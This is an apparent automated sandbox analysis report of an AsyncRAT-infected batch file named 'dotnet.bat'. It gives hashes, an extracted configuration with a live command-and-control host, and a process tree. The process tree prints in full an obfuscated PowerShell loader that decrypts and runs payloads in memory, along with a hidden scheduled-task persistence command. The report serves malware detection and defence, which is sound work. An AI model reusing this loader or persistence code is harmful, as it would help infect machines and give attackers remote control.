Analysis

  • max time kernel
    39s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240611-en locale:en-us os:windows10-2004-x64 system
  • submitted
    27-06-2024 22:08

General

  • Target

    dotnet.bat

  • Size

    62KB

  • MD5

    3dfb1c3ff09dc31a4096b821b9ff204b

  • SHA1

    8604c300175bf352b7612412c6521064a2514674

  • SHA256

    a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

  • SHA512

    895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

  • SSDEEP

    1536:nOTyT0nIr49koWVZVCud2f7vXJiEOlVnpw0APKNjO4mdFqQjHQp+XuHdd:OmTGZ0aPIEapexSNjO4mdFqQjHQp+Xun

Malware Config

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

WinExplOMG

C2

stormx.dynu.net:77

Mutex

winexpomg

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT, written in C#, is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with the display window hidden.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 
6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
        3⤵
          PID:4896
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\dotnet')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:800
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3664
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network15166Man.cmd"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4912
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network15166Man.cmd';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp 
([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "
                6⤵
                  PID:4000
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:464
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4924
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network15166Man')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4212
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 15166' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network15166Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4344
          • C:\Windows\system32\timeout.exe
            timeout /nobreak /t 1
            3⤵
            • Delays execution with timeout.exe
            PID:3424
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2768

        Network

        MITRE ATT&CK Enterprise v15


        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          938ffc2cba917b243d86b2cf76dcefb4

          SHA1

          234b53d91d075f16cc63c731eefdae278e2faad3

          SHA256

          5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

          SHA512

          e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          21KB

          MD5

          ca86c56c43469d64429b0ceac9a6244a

          SHA1

          096af882cffc54003eb90c70ea0e7430bab218ce

          SHA256

          8e9e05e948ea3ae93545f3c079e718a24d2b3224fa1686eae5fbe3621d74059c

          SHA512

          634c878e298022da59fdcc2c33b6514bf5d45d6e4d893d2646c63e1922e5066c98b88d7c09256e6aadeba18012406fb896ff2b337eb16f886d162493979adeeb

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          21KB

          MD5

          86340a2269cc2e3ed5f72aff7c6e87b7

          SHA1

          ed4e05673352bf376a4ea5a0a3c81e935f68bbd7

          SHA256

          1238383796584fcf9f5bfd63424b06b685dc73b18edf53bf52114cdc58363ffc

          SHA512

          9df41060170fed81a12aca98c3f6183201c3636bb1f76f7e2b3ccb7d0be66b523bb16f28d8d1501238bcf9b2bca527c84c206334239b0ee2566286b782c705ca

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          632280a520f1aaf45cee26c44f846468

          SHA1

          69f0e1002e99101089e42072f0c8505a5f542353

          SHA256

          122dbb93b1e8f381b06abf0cb7901ea14709b57c941b2e16abb4c2d70efd1018

          SHA512

          94237bdbdd13df82ca75362878fee31f8ca9952c872cd2961f27ee99d9bf9f4718e9bfab12f4e59a520ee10fdbc10596d995f2dcbfc2117a3389012b61078eed

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          20KB

          MD5

          bc5e40517fe8f3f73fdd3a27d4fe7d6d

          SHA1

          0b0ea9ee27a747a5b6a4121de931dd15f0429bb4

          SHA256

          a7e28126148286b23e0a2e3146d2c7a7a4b5d780cc8ff50bb4e3f4c7f486a8c4

          SHA512

          c169fbf7c0a722abffd7802bbfc7559adacc3e7ba9ffcfe2825f2055d8860f8ddf90aa5ecffb2c9b7e8bdb409479870c463048af1d98e161ad854644f45f0eaf

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_puf2xrl2.0of.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Network15166Man.cmd

          Filesize

          62KB

          MD5

          3dfb1c3ff09dc31a4096b821b9ff204b

          SHA1

          8604c300175bf352b7612412c6521064a2514674

          SHA256

          a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b

          SHA512

          895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172

        • memory/464-160-0x0000000007E50000-0x0000000007E5A000-memory.dmp

          Filesize

          40KB

        • memory/464-159-0x0000000007E70000-0x0000000007F02000-memory.dmp

          Filesize

          584KB

        • memory/464-158-0x0000000008B60000-0x0000000009104000-memory.dmp

          Filesize

          5.6MB

        • memory/464-157-0x0000000005290000-0x00000000052A6000-memory.dmp

          Filesize

          88KB

        • memory/800-77-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/1916-111-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

          Filesize

          408KB

        • memory/1916-22-0x0000000007BA0000-0x000000000821A000-memory.dmp

          Filesize

          6.5MB

        • memory/1916-23-0x0000000007540000-0x000000000755A000-memory.dmp

          Filesize

          104KB

        • memory/1916-1-0x0000000004CD0000-0x0000000004D06000-memory.dmp

          Filesize

          216KB

        • memory/1916-3-0x0000000005340000-0x0000000005968000-memory.dmp

          Filesize

          6.2MB

        • memory/1916-2-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-4-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/1916-39-0x0000000007620000-0x0000000007630000-memory.dmp

          Filesize

          64KB

        • memory/1916-20-0x0000000006720000-0x0000000006764000-memory.dmp

          Filesize

          272KB

        • memory/1916-5-0x00000000052C0000-0x00000000052E2000-memory.dmp

          Filesize

          136KB

        • memory/1916-21-0x00000000074A0000-0x0000000007516000-memory.dmp

          Filesize

          472KB

        • memory/1916-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp

          Filesize

          4KB

        • memory/1916-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

          Filesize

          408KB

        • memory/1916-17-0x0000000005C40000-0x0000000005F94000-memory.dmp

          Filesize

          3.3MB

        • memory/1916-18-0x00000000061C0000-0x00000000061DE000-memory.dmp

          Filesize

          120KB

        • memory/1916-19-0x00000000061E0000-0x000000000622C000-memory.dmp

          Filesize

          304KB

        • memory/3444-24-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-25-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-26-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/3444-38-0x0000000074F20000-0x00000000756D0000-memory.dmp

          Filesize

          7.7MB

        • memory/4212-134-0x0000000007640000-0x0000000007651000-memory.dmp

          Filesize

          68KB

        • memory/4212-123-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4212-133-0x00000000072E0000-0x0000000007383000-memory.dmp

          Filesize

          652KB

        • memory/4344-146-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4824-62-0x0000000007B00000-0x0000000007BA3000-memory.dmp

          Filesize

          652KB

        • memory/4824-50-0x0000000007AB0000-0x0000000007AE2000-memory.dmp

          Filesize

          200KB

        • memory/4824-51-0x0000000070CC0000-0x0000000070D0C000-memory.dmp

          Filesize

          304KB

        • memory/4824-61-0x0000000007A90000-0x0000000007AAE000-memory.dmp

          Filesize

          120KB

        • memory/4824-65-0x0000000007E50000-0x0000000007E61000-memory.dmp

          Filesize

          68KB

        • memory/4824-63-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

          Filesize

          40KB

        • memory/4824-64-0x0000000007EE0000-0x0000000007F76000-memory.dmp

          Filesize

          600KB